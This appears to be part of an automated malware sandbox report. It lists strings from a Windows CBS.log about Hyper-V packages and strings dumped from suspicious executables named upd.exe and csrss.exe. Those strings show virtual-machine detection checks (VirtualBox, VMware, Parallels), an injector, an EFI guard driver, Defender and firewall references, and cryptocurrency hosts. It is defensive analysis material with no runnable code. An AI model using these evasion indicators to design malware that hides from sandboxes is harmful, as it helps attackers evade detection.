Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:54, Info CBS Appl: DetectUpdate, Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Local Parent: Microsoft-Hyper-V-All, Intended State: Staged
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: HyperV-Compute-System-VirtualMachine-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: cead152c266254f49dbb9b3d3e33f6ed, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:57, Info CBS Update: Setting Install State, Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Hyper-V-All, current State: Default, new state: Off, RemovePayload: 0
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Hyper-V-Management-PowerShell, current: Staged, pending: Default, start: Staged, applicable: Staged, targeted: Staged, limit: Installed, selected: Off
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Appl: DetectUpdate, Package: Microsoft-Windows-PAW-Feature-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Remote Parent: Microsoft-Hyper-V, Intended State: Staged
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-Online-Services-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 36f6d4975967228db5be330358a79c61, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: HyperV-Compute-System-VirtualMachine-vm-Package~31bf3856ad364e35~amd64~~10.0.17134.1, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: HyperV-Compute-System-VirtualMachine-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 27a952ddb20b8a44c2d225c36c4b0274, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:57, Info CBS Update: Setting Install State, Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Hyper-V, current State: Default, new state: Off, RemovePayload: 0
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-Offline-Core-Group-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 374c9d21846cca7a5951fd26665cb73b, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: HyperV-Compute-System-VirtualMachine-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: f161f1daec93b6f9633ae86b222e7d6b, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
Source: upd.exe, csrss.exe Binary or memory string: EndOfFileSetErrorModeSetStdHandleSora_SompengSyloti_NagriSysStringLenThread32NextTransitionalTransmitFileUnauthorizedUnlockFileExVBoxTray.exeVariantClearVirtualAllocVirtualQueryWinmon32.sysWinmon64.sysWintrust.dllX-ImforwardsX-Powered-By[[:^ascii:]]\/(\d+)-(.*
Source: upd.exe, csrss.exe Binary or memory string: llocStringLenToo Many RequestsTransfer-EncodingUnified_IdeographVGAuthService.exeWSAEnumProtocolsWWTSQueryUserTokenWrite after CloseX-Idempotency-Key\System32\drivers\\.\VBoxMiniRdrDNbad TinySizeClasscouldn't dial: %wcouldn't find pidcouldn't get UUIDcouldn't
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-Online-Services-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 9c32724c11c2062b0cd209906baed874, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: HyperV-Compute-System-VirtualMachine-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 89b6e9bbb8d4e09208a54048cb490ab6, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Appl: Evaluating package applicability for package Microsoft-Hyper-V-Package-base-onecore-Package~31bf3856ad364e35~amd64~~10.0.17134.1, applicable state: Installed
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Appl: DetectUpdate, Package: Microsoft-Windows-PAW-Feature-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Remote Parent: Microsoft-Hyper-V-Hypervisor, Intended State: Staged
Source: csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp Binary or memory string: m=] n=agedarchasn1avx2basebindbirdbluebmi1bmi2boldboolbushcallcap cas1cas2cas3cas4cas5cas6chancoldcooldampdarkdatadatedawndeaddialdustermsetagfailfilefirefrogfromftpsfuncgziphazehillholyhosthourhttpicmpidleigmpint8jpegjsonkindlakelateleaflinklongmoonnonenullopenpathpinepipepondpop3quitrainreadsbrkseeksid=smtpsnowsse2sse3starsurftag:tcp4tcp6texttreetruetypeudp6uintunixuuidvaryvmciwavewildwindwoodxn-- -%s ...
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:56:55, Info CBS Exec: Package: Microsoft-Hyper-V-Hypervisor-Package~31bf3856ad364e35~amd64~~10.0.17134.1 is already in the correct state, current: Staged, targeted: Staged
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Hyper-V-Management-Clients-62, current: Staged, pending: Default, start: Staged, applicable: Staged, targeted: Staged, limit: Installed, selected: Default
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:57:09, Info CBS Appl: DetectUpdate, Package: Microsoft-Windows-PAW-Feature-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Remote Parent: Microsoft-Hyper-V-Services, Intended State: Staged
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-Hypervisor-onecore-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 350d2f419bdddcb6a98b096b17a5e4ec, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:56:56, Info CBS Exec: Skipping Package: Microsoft-Hyper-V-Offline-Common-vm-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 1007f7901cdcdcd84e1638c6732a7565 because it is already in the correct state.
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:57, Info CBS Update: Setting Install State, Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Hyper-V-Hypervisor, new state: Off
Source: csrss.exe Binary or memory string: too many linkstoo many usersunexpected EOFunknown code: unknown error unknown markerunknown methodunknown mode: unreachable: unsafe.Pointervirtualbox: %wvmwaretray.exevmwareuser.exewii libnup/1.0winapi error #work.full != 0x509ignoreCN=1xenservice.exezero par
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:57:09, Info CBS Appl: Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Hyper-V, Applicable: NeedsParent, Disposition: Staged
Source: csrss.exe Binary or memory string: ionPalmyreneParseUintPatchTimePublisherReleaseDCRemoveAllSamaritanSee OtherSeptemberSundaneseSysnativeToo EarlyTrailer: TypeCNAMETypeHINFOTypeMINFOUse ProxyVBoxGuestVBoxMouseWSASendToWednesdayWindows 7WriteFileZ07:00:00[%v = %d][:^word:][:alnum:][:alpha:][:asc
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: HyperV-Compute-System-VirtualMachine-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 54471d62ed5a517374d13bdd02cd715e, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-Services-Package~31bf3856ad364e35~amd64~~10.0.17134.1, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:54, Info CBS Appl: Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Hyper-V-Tools-All, Applicable: NeedsParent, Disposition: Staged
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:57:09, Info CBS Appl: Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Hyper-V-Services, Applicable: NeedsParent, Disposition: Staged
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-Offline-Common-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: b53b41e2e1c4409bda9e9a54b7b3b422, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:56:56, Info CBS Exec: Skipping Package: Microsoft-Hyper-V-Offline-Common-onecore-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 878b2f9862ce158a90aa7b5c871b772e because it is already in the correct state.
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: HyperV-Primitive-VirtualMachine-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 9778903714986ba7c2a01fb00bd42436, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-Offline-Common-vm-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 1007f7901cdcdcd84e1638c6732a7565, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:57, Info CBS Update: Setting Install State, Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Hyper-V-Management-Clients, current State: Default, new state: Off, RemovePayload: 0
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Appl: Evaluating package applicability for package Microsoft-Hyper-V-Offline-Core-Group-vm-Package~31bf3856ad364e35~amd64~~10.0.17134.1, applicable state: Installed
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: HyperV-Compute-System-VirtualMachine-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 101afe1e2ee3fa31a2c2b78c5d9a5aaf, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:57:09, Info CBS Appl: DetectUpdate, Package: Microsoft-Windows-PAW-Feature-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Remote Parent: Microsoft-Hyper-V-Hypervisor, Intended State: Staged
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:56:42, Info CBS Appl: Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Hyper-V, Applicable: NeedsParent, Disposition: Staged
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:57:09, Info CBS Appl: DetectUpdate, Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Local Parent: Microsoft-Hyper-V, Intended State: Staged
Source: upd.exe.0.dr Binary or memory string: dvdyvmci
Source: csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp Binary or memory string: H_T= H_a= H_g= MB, W_a= and h_a= h_g= h_t= max= ptr siz= tab= top= u_a= u_g=%s %q%s*%d%s/%s%s:%d%s=%s%v-%v&#34;&#39;&amp;+0330+0430+0530+0545+0630+0845+1030+1245+1345, ..., fp:-0930.html.jpeg.wasm.webp156253.2.2500015000250003500045000550006560015600278125:***@:path<nil>AdlamAprilAttr(BamumBatakBuhidCall CountDograECDSAErrorFlagsFoundGetDCGreekHTTP/KhmerLatinLimbuLocalLstatMarchNushuOghamOriyaOsageP-224P-256P-384P-521PGDSERangeRealmRunicSTermTakriTamilTypeAUUID=\u202allowarraybad nblackbrookchdirclosecloudcsrssdreamemptyfalsefaultfieldfloatfrostgcinggladegrassgreenhttpsimap2imap3imapsint16int32int64matchmistymkdirmonthmuddynightntohspanicpaperparsepgdsepop3sproudquietrangeriverrmdirroughrouterune sdsetshapesleepslicesmallsmokesnowysockssoundsse41sse42ssse3stilltext/tls13tls: totaluint8usageuser=utf-8valuevmusbvmx86voicewaterwhitewispywriteyoung (MB)
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:56:56, Info CBS Exec: Package: HyperV-Compute-System-VirtualMachine-vm-Package~31bf3856ad364e35~amd64~~10.0.17134.1 is already in the correct state, current: Staged, targeted: Staged
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Appl: Evaluating package applicability for package Microsoft-Hyper-V-Online-Services-vm-Package~31bf3856ad364e35~amd64~~10.0.17134.1, applicable state: Installed
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Appl: DetectUpdate, Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Local Parent: Microsoft-Hyper-V-Management-Clients, Intended State: Staged
Source: csrss.exe Binary or memory string: main.isRunningInsideVMWare
Source: csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp Binary or memory string: entersyscallexit status found av: %sgcpacertracegetaddrinfowgot TI tokenguid_machinehost is downhttp2debug=1http2debug=2illegal seekinjector.exeinstall_dateinvalid baseinvalid portinvalid slotiphlpapi.dllkernel32.dllmachine_guidmadvdontneedmax-forwardsnetapi32.dllno such hostnon-existentnot pollableoleaut32.dllout of rangeparse PE: %wpointtopointproxyconnectreflect.Copyreleasep: m=remote errorruntime: f= runtime: gp=s ap traffics hs trafficshort buffersignature.%stransmitfileulrichard.chunexpected )unknown portunknown typevmacthlp.exevmtoolsd.exewatchdog.exewinlogon.exewintrust.dllwirep: p->m=wtsapi32.dll != sweepgen (default %q) (default %v) MB released
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Onecore-SPP-VirtualDevice, current: Staged, pending: Default, start: Staged, applicable: Staged, targeted: Staged, limit: Installed, selected: Default
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-Offline-Common-Package~31bf3856ad364e35~amd64~~10.0.17134.1, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-Hypervisor-onecore-Package~31bf3856ad364e35~amd64~~10.0.17134.1, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-Offline-Core-Group-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 268bf92397d59ed4327a8ab865bfc689, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Appl: Evaluating package applicability for package Microsoft-Hyper-V-Services-Package~31bf3856ad364e35~amd64~~10.0.17134.1, applicable state: Installed
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Appl: Evaluating package applicability for package HyperV-Compute-System-VirtualMachine-onecore-Package~31bf3856ad364e35~amd64~~10.0.17134.1, applicable state: Installed
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-Hypervisor-Package~31bf3856ad364e35~amd64~~10.0.17134.1, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged
Source: csrss.exe Binary or memory string: uetypeudp6uintunixuuidvaryvmciwavewildwindwoodxn-- -%s ... H_T= H_a= H_g= MB, W_a= and h_a= h_g= h_t= max= ptr siz= tab= top= u_a= u_g=%s %q%s*%d%s/%s%s:%d%s=%s%v-%v&#34;&#39;&amp;+0330+0430+0530+0545+0630+0845+1030+1245+1345, ..., fp:-0930.html.jpeg.wasm
Source: csrss.exe Binary or memory string: tUsage of %s: Value is nullVirtualUnlockWINDOW_UPDATEWTSFreeMemoryWriteConsoleW[FrameHeader \\.\VBoxGuestaccept-rangesaccess deniedadvapi32.dll
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:57:09, Info CBS Appl: Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Hyper-V-Management-Clients, Applicable: NeedsParent, Disposition: Staged
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Windows-RemoteFX-Graphics-Virtualization-Host, current: Staged, pending: Default, start: Staged, applicable: Staged, targeted: Staged, limit: Installed, selected: Default
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Appl: Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: HyperV-Networking-Containers-Package, Applicable: NeedsParent, Disposition: Staged
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:57:09, Info CBS Appl: DetectUpdate, Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Local Parent: Microsoft-Hyper-V-All, Intended State: Staged
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: HyperV-Compute-System-VirtualMachine-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 7a9c36033f0c22829893bc1c0a5e07a8, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Appl: DetectUpdate, Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Local Parent: Microsoft-Hyper-V-Tools-All, Intended State: Staged
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-Offline-Core-Group-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: fc0d60ecae9730160d4af9bb0ca3213e, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Appl: detect Parent, Package: Microsoft-Windows-RemoteFX-Graphics-Virtualization-Host-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Parent: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Disposition = Detect, VersionComp: EQ, BuildComp: EQ, RevisionComp: EQ, Exist: present
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-Offline-Core-Group-onecore-Package~31bf3856ad364e35~amd64~~10.0.17134.1, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: HyperV-Compute-System-VirtualMachine-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 1505902669a359dad80a977529ca66cd, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:56:56, Info CBS Exec: Skipping Package: Microsoft-Hyper-V-Offline-Core-Group-onecore-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 8381c0f3cdb917a83d773f922f3b5250 because it is already in the correct state.
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-Offline-Core-Group-vm-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 7af75ecf5d4e3ae499f64704cca67740, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: HyperV-Compute-System-VirtualMachine-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: c2f20508edf3c1fbda6e99ff59eb02d8, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
Source: csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp Binary or memory string: l}main.isRunningInsideVMWare
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:57, Info CBS Update: Setting Install State, Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Hyper-V-Tools-All, new state: Off
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: HyperV-Compute-System-VirtualMachine-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 976eb15fe43109e4df4c51c7509e8caf, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Hyper-V-Tools-All, current: Staged, pending: Default, start: Staged, applicable: Staged, targeted: Staged, limit: Installed, selected: Off
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:56:56, Info CBS Exec: Skipping Package: Microsoft-Hyper-V-Offline-Core-Group-servercommon-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 8c028159d1d14a93f99d8c89b6f63e99 because it is already in the correct state.
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Appl: Evaluating package applicability for package Microsoft-Hyper-V-Offline-Core-Group-servercommon-Package~31bf3856ad364e35~amd64~~10.0.17134.1, applicable state: Installed
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Merge into existing execution package for Package: HyperV-Primitive-VirtualMachine-Package~31bf3856ad364e35~amd64~~10.0.17134.1, existing TargetedState: Staged, new TargetedState: Staged
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-Offline-Common-onecore-Package~31bf3856ad364e35~amd64~~10.0.17134.1, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: HyperV-Compute-System-VirtualMachine-onecore-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 4584754bbb113844563ccba331941b2b, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Appl: Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Onecore-SPP-VirtualDevice, Applicable: NeedsParent, Disposition: Staged
Source: csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp Binary or memory string: DSA-SHA1DecemberDefenderDeleteDCDuployanEqualSidEthiopicExtenderFebruaryFirewallFullPathGeorgianGetOEMCPGoStringGujaratiGurmukhiHTTP/1.1HTTP/2.0HiraganaInstFailInstRuneJavaneseKatakanaKayah_LiLinear_ALinear_BLocationLsaCloseMahajaniNO_ERRORNO_PROXYNovemberOl_ChikiPRIORITYParseIntPersoconPhags_PaQuestionReadFileReceivedSETTINGSSHA1-RSASaturdaySetEventSystem32TagbanwaTai_ThamTai_VietThursdayTifinaghTypeAAAATypeAXFRUgariticVBoxWddmVT_ARRAYVT_BYREFWSAIoctlWinmonFS[:word:][signal \\.\HGFS\\.\vmcistack=[_NewEnumacceptexaddress bad instcgocheckcs darknessdefault:delicatednsquerydurationeax ebp ebx ecx edi edx eflags eip embeddedesi esp exporterfinishedfragrantfs go1.13.3gs hijackedhttp/1.1https://if-matchif-rangeinfinityinjectorinvalid locationloopbackmac_addrmountainmountvolmsvmmoufnamelessno anodeno-cacheno_proxyopPseudopolishedraw-readreadfromrecvfromrestlessrunnableruntime.scavengeshutdownsolitarystrconv.taskkilltwilightunixgramunknown(usernamevmmemctlvmx_svgawitheredwsaioctlwuauservyuio.top (forced) blocked= defersc= in use)
Source: csrss.exe Binary or memory string: ridayGOAWAYGOROOTGetACPGothicHangulHatranHebrewHyphenKaithiKhojkiLepchaLockedLycianLydianMondayPADDEDPcaSvcPragmaProgidRejangSCHED STREETServerStringSundaySyriacTai_LeTangutTeluguThaanaTypeMXTypeNSUTC+12UTC+13UTC-02UTC-08UTC-09UTC-11VBoxSFVT(%d)WINDIRWinMonWin
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Appl: Evaluating package applicability for package Microsoft-Hyper-V-Offline-Common-Package~31bf3856ad364e35~amd64~~10.0.17134.1, applicable state: Installed
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:56:56, Info CBS Exec: Package: Microsoft-Hyper-V-Online-Services-Package~31bf3856ad364e35~amd64~~10.0.17134.1 is already in the correct state, current: Staged, targeted: Staged
Source: upd.exe.0.dr Binary or memory string: VMSrvc
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, current: Installed, pending: Default, start: Installed, applicable: Installed, targeted: Installed, limit: Installed
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-Offline-Core-Group-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 0b74307a9b8d5a99fef4ac35da0bd75f, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
Source: csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp Binary or memory string: Value is nullVirtualUnlockWINDOW_UPDATEWTSFreeMemoryWriteConsoleW[FrameHeader \\.\VBoxGuestaccept-rangesaccess deniedadvapi32.dllauthorizationbad flushGen bad map statebtc.cihar.combtc.xskyx.netcache-controlcontent-rangecouldn't polldalTLDpSugct?data is emptyemail addressempty integerexchange fullfatal error: gethostbynamegetservbynamegzip, deflatehttp2client=0if-none-matchimage/svg+xmlinvalid UTF-8invalid base kernel32.dllkey expansionlast-modifiedlevel 3 resetload64 failedlogs endpointmaster secretname is emptynil stackbasenot a Float32open file: %wout of memoryparallels: %wparse URL: %wparsing time powrprof.dllprl_tools.exerebooting nowscvg: inuse: servers countservice statesigner is nilsmb start: %wsocks connectsrmount errorstill in listtimer expiredtrailing datatriggerRatio=unimplementedunsupported: user canceledvalue method verifier hashverifier hostvirtualpc: %wxadd64 failedxchg64 failed}
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-Online-Services-Package~31bf3856ad364e35~amd64~~10.0.17134.1, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged
Source: csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp Binary or memory string: is unavailable()<>@,;:\"/[]?=0601021504Z0700476837158203125: cannot parse :ValidateLabels; SameSite=None<invalid Value>ASCII_Hex_DigitAccept-EncodingAccept-LanguageAddDllDirectoryBelowExactAboveCLSIDFromProgIDCLSIDFromStringCreateHardLinkWCreateWindowExWDefaultInstanceDelegateExecuteDeviceIoControlDuplicateHandleEfiGuardDxe.efiElectrumX 1.2.1Failed to find Failed to load FindNextVolumeWFindVolumeCloseFlushViewOfFileGateway TimeoutGetActiveObjectGetAdaptersInfoGetCommTimeoutsGetCommandLineWGetFirmwareTypeGetProcessTimesGetSecurityInfoGetStartupInfoWGlobal\qtxp9g8wHanifi_RohingyaIdempotency-KeyImpersonateSelfInstall failureIsWow64Process2Length RequiredLoadLibraryExALoadLibraryExWNonTransitionalNot ImplementedNtSuspendThreadOpenThreadTokenOther_LowercaseOther_UppercasePartial ContentProcess32FirstWPsalter_PahlaviQueryDosDeviceWRegCreateKeyExWRegDeleteValueWRequest 